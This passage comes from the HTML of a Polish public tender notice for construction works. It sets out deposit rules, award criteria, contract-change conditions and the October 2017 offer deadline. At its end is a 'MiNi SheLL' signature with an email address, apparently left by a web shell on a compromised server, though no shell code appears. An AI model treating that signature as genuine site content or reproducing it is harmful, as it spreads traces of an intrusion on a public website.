najpóźniej w dniu 04.10.2017 r. o godzinie 12:00 znajdzie się na koncie Zamawiającego.Uwaga: Wadium w pieniądzu wnosi się przelewem na rachunek bankowy wskazany przezZamawiającego (art. 45 ust. 7 ustawy PZP). Z przepisu tego wynika jednoznacznie obowiązekbezgotówkowego rozliczenia wadium w drodze przelewu bankowego. Przepis ten wyraźnie wykluczadokonywanie wpłat gotówkowych na rachunek Zamawiającego i to niezależnie od tego, czy wpłatataka dokonywana byłaby w kasie banku prowadzącego rachunek zamawiającego, czy też zupełnieinnego banku. Przepis mówi o przelewie, a więc operacji bezgotówkowej, a nie gotówkowej.Wniesienie wadium w formie gotówkowej na rachunek Zamawiającego jest niedopuszczalną formązabezpieczenia oferty, co w konsekwencji skutkować będzie wykluczeniem Wykonawcy z postępowania. 3. Wadium w innej formie niż w ppkt. 2 należy złożyć (oryginał) razem z ofertą woddzielnej kopercie, a jego kopię potwierdzoną za zgodność z oryginałem załączyć jako integralnączęść oferty. Wadium ma zabezpieczać interes Zamawiającego na okres wskazany w rozdziale VIISIWZ. Kserokopię gwarancji należy dołączyć do oferty. Brak dokumentu w ofercie nie spowodujeodrzucenia oferty. 4. Wadium wnoszone w innej formie niż pieniądz nie może zawierać ograniczeńsprzecznych z ustawą PZP, a w szczególności zapisów ograniczających możliwość zrealizowania prawokreślonych w art. 46 ust 4a i ust 5 ustawy PZP, ponadto z treści wadium składanego w innej formieniż pieniądz powinno wynikać jednoznacznie, gwarantowanie wypłaty należności w sposóbnieodwołalny, bezwarunkowy i na pierwsze żądanie. Wadium ma zabezpieczać interes Zamawiającegona okres wskazany w pkt VII SIWZ 5. Oferta Wykonawcy, który nie zabezpieczy uczestnictwa wpostępowaniu akceptowaną formą wadium zostanie przez Zamawiającego odrzucona na podstawie art.89 ust. 1 pkt. 7b ustawy prawo zamówień publicznych. 6. Warunki zwrotu i zatrzymania wadium sąokreślone w art. 46 ustawy PZP. 7. W przypadku składania ofert przez Wykonawców wspólnieubiegających się o zamówienie, wadium wniesione przez jednego z Wykonawców wspólnieubiegających się o udzielenie zamówienia uważa się za wniesione prawidłowo.</span> </div> <br/> <b>IV.1.3) Przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_przewiduje_udzielenie_zaliczek">Tak</span> <br/> Należy podać informacje na temat udzielania zaliczek: <br/> <span id="ctl00_ContentPlaceHolder1_przewiduje_udzielenie_zaliczek">Zamawiający przewiduje udzielenie zaliczek na poczet wykonania zamówienia. Zgodnie z treściąwzoru umowy stanowiącego załącznik nr 2 do SIWZ.</span> </div> <br/> <b> IV.1.4) Wymaga się złożenia ofert w postaci katalogów elektronicznych lub dołączenia do ofert katalogów elektronicznych: </b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_wymaga_zlozenie_katalogow_elektronicznych">Nie</span> <br/> Dopuszcza się złożenie ofert w postaci katalogów elektronicznych lub dołączenia do ofert katalogów elektronicznych: <br/> <span id="ctl00_ContentPlaceHolder1_czy_dopuszcza_zlozenie_katalogow_elektronicznych">Nie</span> <br/> Informacje dodatkowe: <br/> <span id="ctl00_ContentPlaceHolder1_zlozenie_katalogow_elektronicznych_informacje_dodatkowe"></span> </div> <br/> <b> IV.1.5.) Wymaga się złożenia oferty wariantowej: </b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_wymaga_zlozenie_oferty_wariantowej">Nie</span> <br/> Dopuszcza się złożenie oferty wariantowej <br/> <span id="ctl00_ContentPlaceHolder1_czy_dopuszcza_zlozenie_oferty_wariantowej">Nie</span> <br/> Złożenie oferty wariantowej dopuszcza się tylko z jednoczesnym złożeniem oferty zasadniczej: <br/> <span id="ctl00_ContentPlaceHolder1_czy_dopuszcza_zlozenie_oferty_wariantowej_zasadniczej"></span> </div> <br/> <b> IV.1.6) Przewidywana liczba wykonawców, którzy zostaną zaproszeni do udziału w postępowaniu </b> <br/> <i> (przetarg ograniczony, negocjacje z ogłoszeniem, dialog konkurencyjny, partnerstwo innowacyjne) </i> <div style="padding-left: 20px"> Liczba wykonawców &#160;<span id="ctl00_ContentPlaceHolder1_liczba_wykonawcow"></span> <br/> Przewidywana minimalna liczba wykonawców <span id="ctl00_ContentPlaceHolder1_minimalna_liczba_wykonawcow"></span> <br/> Maksymalna liczba wykonawców &#160;<span id="ctl00_ContentPlaceHolder1_maksymalna_liczba_wykonawcow"></span> <br/> Kryteria selekcji wykonawców: <br/> <span id="ctl00_ContentPlaceHolder1_znaczenie_warunkow_wykonawcow"></span> </div> <br/> <b> IV.1.7) Informacje na temat umowy ramowej lub dynamicznego systemu zakupów: </b> <div style="padding-left: 20px"> Umowa ramowa będzie zawarta: <br/> <span id="ctl00_ContentPlaceHolder1_z_kim_umowa_bedzie_zawarta"></span> <br/> Czy przewiduje się ograniczenie liczby uczestników umowy ramowej: <br/> <span id="ctl00_ContentPlaceHolder1_czy_ograniczenie_liczby_uczestnikow"></span> <br/> Przewidziana maksymalna liczba uczestników umowy ramowej: <br/> <span id="ctl00_ContentPlaceHolder1_ograniczenie_liczby_uczestnikow"></span> <br/> Informacje dodatkowe: <br/> <span id="ctl00_ContentPlaceHolder1_ograniczenie_liczby_uczestnikow_informacje_dodatkowe"></span> <br/> Zamówienie obejmuje ustanowienie dynamicznego systemu zakupów: <br/> <span id="ctl00_ContentPlaceHolder1_czy_obejmuje_ustanowienie"></span> <br/> Adres strony internetowej, na której będą zamieszczone dodatkowe informacje dotyczące dynamicznego systemu zakupów: <br/> <span id="ctl00_ContentPlaceHolder1_obejmuje_ustanowienie"></span> <br/> Informacje dodatkowe: <br/> <span id="ctl00_ContentPlaceHolder1_obejmuje_ustanowienie_informacje_dodatkowe"></span> <br/> W ramach umowy ramowej/dynamicznego systemu zakupów dopuszcza się złożenie ofert w formie katalogów elektronicznych: <br/> <span id="ctl00_ContentPlaceHolder1_czy_umowy_ramowej_dynamicznego_katalogow"></span> <br/> Przewiduje się pobranie ze złożonych katalogów elektronicznych informacji potrzebnych do sporządzenia ofert w ramach umowy ramowej/dynamicznego systemu zakupów: <br/> <span id="ctl00_ContentPlaceHolder1_czy_pobranie_umowy_ramowej_dynamicznego_katalogow"></span> </div> <br/> <b>IV.1.8) Aukcja elektroniczna </b> <br/> <b> Przewidziane jest przeprowadzenie aukcji elektronicznej </b><i>(przetarg nieograniczony, przetarg ograniczony, negocjacje z ogłoszeniem) </i> <span id="ctl00_ContentPlaceHolder1_aukcja_elektroniczna">Nie</span> <br/> Należy podać adres strony internetowej, na której aukcja będzie prowadzona: <br/> <span id="ctl00_ContentPlaceHolder1_adres_strony_na_ktorej_bedzie_prowadzona"></span> <br/> <b>Należy wskazać elementy, których wartości będą przedmiotem aukcji elektronicznej: </b> <span id="ctl00_ContentPlaceHolder1_elementy_aukcji_elektronicznej"></span> <br/> <b>Przewiduje się ograniczenia co do przedstawionych wartości, wynikające z opisu przedmiotu zamówienia:</b> <br/> <span id="ctl00_ContentPlaceHolder1_ograniczenia_do_przedstawianych_wartosci"></span> <br/> Należy podać, które informacje zostaną udostępnione wykonawcom w trakcie aukcji elektronicznej oraz jaki będzie termin ich udostępnienia: <span id="ctl00_ContentPlaceHolder1_informaje_udostepnione_wykonawcom"></span> <br/> Informacje dotyczące przebiegu aukcji elektronicznej: <span id="ctl00_ContentPlaceHolder1_informaje_przebiegu_aukcji"></span> <br/> Jaki jest przewidziany sposób postępowania w toku aukcji elektronicznej i jakie będą warunki, na jakich wykonawcy będą mogli licytować (minimalne wysokości postąpień): <span id="ctl00_ContentPlaceHolder1_warunki_do_licytacji"></span> <br/> Informacje dotyczące wykorzystywanego sprzętu elektronicznego, rozwiązań i specyfikacji technicznych w zakresie połączeń: <span id="ctl00_ContentPlaceHolder1_wykorzystanie_sprzetu_elektronicznego"></span> <br/> Wymagania dotyczące rejestracji i identyfikacji wykonawców w aukcji elektronicznej: <span id="ctl00_ContentPlaceHolder1_wymagania_dotyczace_rejestracji_wyk_aukcja"></span> <br/> Informacje o liczbie etapów aukcji elektronicznej i czasie ich trwania: <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_aukcja_jednoetapowa"></span> <br/>Czas trwania: <span id="ctl00_ContentPlaceHolder1_IV_aukcja_jednoetapowa_czas"></span> <br /> <br/> Czy wykonawcy, którzy nie złożyli nowych postąpień, zostaną zakwalifikowani do następnego etapu: <span id="ctl00_ContentPlaceHolder1_IV_aukcja_wykonawcy_zakwalfikowani"></span> <br/> Warunki zamknięcia aukcji elektronicznej: <br/> <span id="ctl00_ContentPlaceHolder1_warunki_zamkniecia_aukcji"></span> </div> <br/> <b>IV.2) KRYTERIA OCENY OFERT </b> <br/> <b>IV.2.1) Kryteria oceny ofert: </b> <br/> <b>IV.2.2) Kryteria</b> <br/> <TABLE style='border: 1px solid black;border-collapse: collapse;'><TR><TD style='border: 1px solid black;border-collapse: collapse;'>Kryteria</TD><TD style='border: 1px solid black;border-collapse: collapse;'>Znaczenie</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>Cena</TD><TD style='border: 1px solid black;border-collapse: collapse;'>60,00</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>Gwarancja </TD><TD style='border: 1px solid black;border-collapse: collapse;'>40,00</TD></TR></TABLE> <br/> <b>IV.2.3) Zastosowanie procedury, o której mowa w art. 24aa ust. 1 ustawy Pzp </b>(przetarg nieograniczony) <br/> <span id="ctl00_ContentPlaceHolder1_zastosowanie_procedury_pzp">Tak</span> <br/> <b>IV.3) Negocjacje z ogłoszeniem, dialog konkurencyjny, partnerstwo innowacyjne </b> <br/> <b>IV.3.1) Informacje na temat negocjacji z ogłoszeniem</b> <br/> Minimalne wymagania, które muszą spełniać wszystkie oferty: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_1_minimalne_wymagania"></span> <br/> Przewidziane jest zastrzeżenie prawa do udzielenia zamówienia na podstawie ofert wstępnych bez przeprowadzenia negocjacji <span id="ctl00_ContentPlaceHolder1_IV_3_1_Przewidziane_jest_zastrzezenie"></span> <br/> Przewidziany jest podział negocjacji na etapy w celu ograniczenia liczby ofert: <span id="ctl00_ContentPlaceHolder1_IV_3_1_Przewidziany_podzial"></span> <br/> Należy podać informacje na temat etapów negocjacji (w tym liczbę etapów): <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_1_etapy_negocjacji"></span> <br/> Informacje dodatkowe <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_1_dodatkowe_informacje"></span> <br/> <br/> <b>IV.3.2) Informacje na temat dialogu konkurencyjnego</b> <br/> Opis potrzeb i wymagań zamawiającego lub informacja o sposobie uzyskania tego opisu: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_2_opis_potrzeb"></span> <br/> Informacja o wysokości nagród dla wykonawców, którzy podczas dialogu konkurencyjnego przedstawili rozwiązania stanowiące podstawę do składania ofert, jeżeli zamawiający przewiduje nagrody: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_2_informacja_wysokosc_nagrod"></span> <br/> Wstępny harmonogram postępowania: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_2_wstepny_harmonogram"></span> <br/> Podział dialogu na etapy w celu ograniczenia liczby rozwiązań: <span id="ctl00_ContentPlaceHolder1_IV_3_2_PodzialDialogu"></span> <br/> Należy podać informacje na temat etapów dialogu: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_2_EtapyDialogu"></span> <br/> <br/> Informacje dodatkowe: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_2_DodatkoweInformacje"></span> <br/> <b>IV.3.3) Informacje na temat partnerstwa innowacyjnego</b> <br/> Elementy opisu przedmiotu zamówienia definiujące minimalne wymagania, którym muszą odpowiadać wszystkie oferty: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_3_ElementyOpisu"></span> <br/> Podział negocjacji na etapy w celu ograniczeniu liczby ofert podlegających negocjacjom poprzez zastosowanie kryteriów oceny ofert wskazanych w specyfikacji istotnych warunków zamówienia: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_3_PodzialNegocjacji"></span> <br/> Informacje dodatkowe: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_3_DodatkoweInfo"></span> <br/> <b>IV.4) Licytacja elektroniczna </b> <br/> Adres strony internetowej, na której będzie prowadzona licytacja elektroniczna: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_6"></span> </div> Adres strony internetowej, na której jest dostępny opis przedmiotu zamówienia w licytacji elektronicznej: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_7"></span> </div> Wymagania dotyczące rejestracji i identyfikacji wykonawców w licytacji elektronicznej, w tym wymagania techniczne urządzeń informatycznych: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_8"></span> </div> Sposób postępowania w toku licytacji elektronicznej, w tym określenie minimalnych wysokości postąpień: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_9"></span> </div> Informacje o liczbie etapów licytacji elektronicznej i czasie ich trwania: <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_10_licytacja_jednoetapowa"></span> <span id="ctl00_ContentPlaceHolder1_IV_4_10_licytacja_jednoetapowa_czas"> Czas trwania: </span> <br /> <br/> Wykonawcy, którzy nie złożyli nowych postąpień, zostaną zakwalifikowani do następnego etapu: <span id="ctl00_ContentPlaceHolder1_IV_4_10_wykonawcy_zakwalfikowani"></span> </div> Termin składania wniosków o dopuszczenie do udziału w licytacji elektronicznej: <br/> Data: <span id="ctl00_ContentPlaceHolder1_IV_4_11_data"></span> godzina: <span id="ctl00_ContentPlaceHolder1_IV_4_11_godzina"></span> <br/> Termin otwarcia licytacji elektronicznej: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_12"></span> </div> Termin i warunki zamknięcia licytacji elektronicznej: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_13"></span> </div> <br/> Istotne dla stron postanowienia, które zostaną wprowadzone do treści zawieranej umowy w sprawie zamówienia publicznego, albo ogólne warunki umowy, albo wzór umowy: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_IstotnePostanowienia"></span> </div> <br/> Wymagania dotyczące zabezpieczenia należytego wykonania umowy: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_14"></span> </div> <br/> Informacje dodatkowe: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_LicytacjeDodatkoweInformacje"></span> </div> <b>IV.5) ZMIANA UMOWY</b> <br/> <b>Przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy:</b> <span id="ctl00_ContentPlaceHolder1_zmiana_umowy">Tak</span> <br/> Należy wskazać zakres, charakter zmian oraz warunki wprowadzenia zmian: <br/> <span id="ctl00_ContentPlaceHolder1_zmiana_umowy_tekst">Należy wskazać zakres, charakter zmian oraz warunki wprowadzenia zmian:Postanowienia dotyczące realizacji zamówienia są zawarte w załączniku nr 2 do SIWZ - projekt umowy.2. Jednocześnie w myśl art. 144 ust. 1 ustawy Pzp Zamawiający dopuszcza możliwość zmianpostanowień umowy w zakresie: 2.1 przedłużenia terminu zakończenia robót na pisemne zgłoszenieWykonawcy w przypadku, gdy niedotrzymanie pierwotnego terminu było wynikiem: 2.1.1 siły wyższej.Przez siłę wyższą rozumie się zdarzenie bądź połączenie zdarzeń lub okoliczności, niezależnych odWykonawcy, które zasadniczo utrudniają lub uniemożliwiają wykonanie zobowiązań wynikających zumowy, a których nie można było przewidzieć ani im zapobiec lub przezwyciężyć poprzez działanie zzachowaniem należytej staranności (między innymi konieczność wykonania robót dodatkowych), 2.1.2 jeżeli przyczyny, z powodu których będą zagrożone dotrzymanie terminu zakończenia robót będąnastępstwem okoliczności, za które odpowiedzialność ponosi Zamawiający, w szczególności będąnastępstwem nieterminowego przekazania terenu budowy, konieczności zmian Dokumentacji projektowejw zakresie, w jakim ww. okoliczności miały lub będą mogły mieć wpływ na dotrzymanie terminuzakończenia robót, 2.1.3 konieczności zrealizowania jakiejkolwiek części robót, objętej przedmiotemumowy, przy zastosowaniu odmiennych rozwiązań technicznych lub technologicznych, niż wskazanew dokumentacji projektowej, a wynikających ze stwierdzonych wad tej dokumentacji lub zmiany stanuprawnego w oparciu, o który je przygotowano, gdyby zastosowanie przewidzianych rozwiązań groziłoniewykonaniem lub nienależytym wykonaniem przedmiotu umowy; 2.1.4 wystąpienia warunków terenubudowy odbiegających w sposób istotny od przyjętych w Dokumentacji projektowej, w szczególnościnapotkania niezinwentaryzowanych lub błędnie zinwentaryzowanych sieci, instalacji; 2.2 jeżeli wystąpibrak możliwości wykonania robót z powodu nie dopuszczenia do ich wykonywania przez uprawnioneorgany lub nakazania ich wstrzymania przez uprawniony organ, z przyczyn niezależnych od Wykonawcy;2.3 Wykonawca jest uprawniony do żądania zmiany umowy w zakresie materiałów, parametrówtechnicznych, technologii wykonania robót budowlanych, sposobu i zakresu wykonania przedmiotuUmowy w następujących sytuacjach: 2.3.1 konieczności zrealizowania jakiejkolwiek części robót, objętejprzedmiotem umowy, przy zastosowaniu odmiennych rozwiązań technicznych lub technologicznych, niżwskazane w dokumentacji projektowej, a wynikających ze stwierdzonych wad tej dokumentacji lubzmiany stanu prawnego w oparciu, o który je przygotowano, gdyby zastosowanie przewidzianychrozwiązań groziło niewykonaniem lub nienależytym wykonaniem przedmiotu umowy; 2.3.2 wystąpieniawarunków terenu budowy odbiegających w sposób istotny od przyjętych w Dokumentacji projektowej, wszczególności napotkania niezinwentaryzowanych lub błędnie zinwentaryzowanych sieci, instalacji; 2.3.3konieczności zrealizowania przedmiotu umowy przy zastosowaniu innych rozwiązań technicznych lubmateriałowych ze względu na zmiany obowiązującego prawa, 3. Wykonawca jest uprawniony do żądaniazmiany wynagrodzenia należnego z tytułu realizacji umowy jednak nie powyżej kosztów wynikającychwedług SEKOCENBUD odpowiednio w przypadkach określonych w pkt 2.3 oraz zastosowaniaponiższych zasad: 3.1 Jeżeli Wykonawca uważa się za uprawnionego do przedłużenia terminuzakończenia robót na podstawie umowy, zmiany umowy w zakresie materiałów, parametrówtechnicznych, technologii wykonania robót budowlanych, sposobu i zakresu wykonania przedmiotuumowy na podstawie pkt 2.3. lub zmiany umowy na innej podstawie wskazanej w umowie, zobowiązanyjest do przekazania Zamawiającemu wniosku dotyczącego zmiany umowy wraz z opisem zdarzenia lubokoliczności stanowiących podstawę do żądania takiej zmiany. 3.2 Wniosek, o którym mowa w pkt 3.1powinien zostać przekazany niezwłocznie, jednakże nie później niż w terminie 7 dni roboczych od dnia,w którym Wykonawca dowiedział się, lub powinien dowiedzieć się o danym zdarzeniu lub okolicznościach. 3.3 Wykonawca zobowiązany jest do dostarczenia wraz z wnioskiem, o którym mowa wpkt 3.1., wszelkich innych niezbędnych dokumentów wymaganych, w tym propozycji rozliczeniaprzygotowanej w oparciu o zasady określone w SIWZ. 3.4 Wykonawca zobowiązany jest do bieżącejdokumentacji koniecznej dla uzasadnienia żądania zmiany i przechowywania jej na terenie budowy lub winnym miejscu wskazanym przez Zamawiającemu. 3.5 Po otrzymaniu wniosku, o którym mowa w pkt 3.4Zamawiający jest uprawniony, bez dokonywania oceny jego zasadności, do kontroli dokumentacji, októrej mowa w pkt 3.4 i wydania Wykonawcy polecenia prowadzenia dalszej dokumentacji bieżącejuzasadniającej żądanie zmiany. 3.6 Wykonawca jest zobowiązany do okazania do wglądu Inspektorowinadzoru inwestorskiego dokumentacji, o której mowa w pkt 3.4. i przedłożenia na żądanieZamawiającego jej kopii.</span> <br/> <b>IV.6) INFORMACJE ADMINISTRACYJNE </b> <br/> <br /> <b>IV.6.1) Sposób udostępniania informacji o charakterze poufnym </b><i>(jeżeli dotyczy): </i> <br /> <span id="ctl00_ContentPlaceHolder1_IV_6_1_sposob_udostepniania"></span> <br/> <b>Środki służące ochronie informacji o charakterze poufnym</b> <br/> <span id="ctl00_ContentPlaceHolder1_IV_6_1_srodki_ochrony"></span> <br/> <b>IV.6.2) Termin składania ofert lub wniosków o dopuszczenie do udziału w postępowaniu: </b> <br/> Data: <span id="ctl00_ContentPlaceHolder1_IV_4_4_data">2017-10-04</span>, godzina: <span id="ctl00_ContentPlaceHolder1_IV_4_4_godzina">12:00</span>, <br/> Skrócenie terminu składania wniosków, ze względu na pilną potrzebę udzielenia zamówienia (przetarg nieograniczony, przetarg ograniczony, negocjacje z ogłoszeniem): <br/> <span id="ctl00_ContentPlaceHolder1_IV_6_2_SkrocenieTerminu">Nie</span> <br/> Wskazać powody: <br/> <span id="ctl00_ContentPlaceHolder1_IV_6_2_Powody"></span> <br/> Język lub języki, w jakich mogą być sporządzane oferty lub wnioski o dopuszczenie do udziału w postępowaniu <br/>> <span id="ctl00_ContentPlaceHolder1_IV_4_4_jezyki">PL</span> <br/> <b>IV.6.3) Termin związania ofertą: </b> do: <span id="ctl00_ContentPlaceHolder1_IV_4_5_data"></span> okres w dniach: <span id="ctl00_ContentPlaceHolder1_IV_4_5_okres">30</span> (od ostatecznego terminu składania ofert) <br/> <b>IV.6.4) Przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia:</b> <span id="ctl00_ContentPlaceHolder1_IV_4_17">Nie</span> <br/> <b>IV.6.5) Przewiduje się unieważnienie postępowania o udzielenie zamówienia, jeżeli środki służące sfinansowaniu zamówień na badania naukowe lub prace rozwojowe, które zamawiający zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia, nie zostały mu przyznane</b> <span id="ctl00_ContentPlaceHolder1_IV_6_5">Nie</span> <br/> <b>IV.6.6) Informacje dodatkowe:</b> <br/> <span id="ctl00_ContentPlaceHolder1_IV_6_6"></span> </div> </div> <div class="headerLarge_xforms" style="text-align: center"> <u> ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH </u> </div> <br /> <div> <br /> </div> <br /> <br /> </div> <br /> <br /> <table> <tr> <td> </td> </tr> </table> </div> <script type="text/javascript">//<![CDATA[//]]></script>

Creat By MiNi SheLL
Email: jattceo@gmail.com